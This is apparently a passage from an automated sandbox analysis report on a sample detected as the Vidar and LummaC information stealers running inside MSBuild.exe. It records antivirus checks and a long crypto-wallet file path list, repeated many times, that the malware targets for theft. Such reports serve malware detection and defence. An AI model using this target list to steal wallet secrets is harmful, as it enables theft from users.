Code function: 0_2_008F7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_008F7815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 11.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.KEGIDHJKKJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2205515395.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 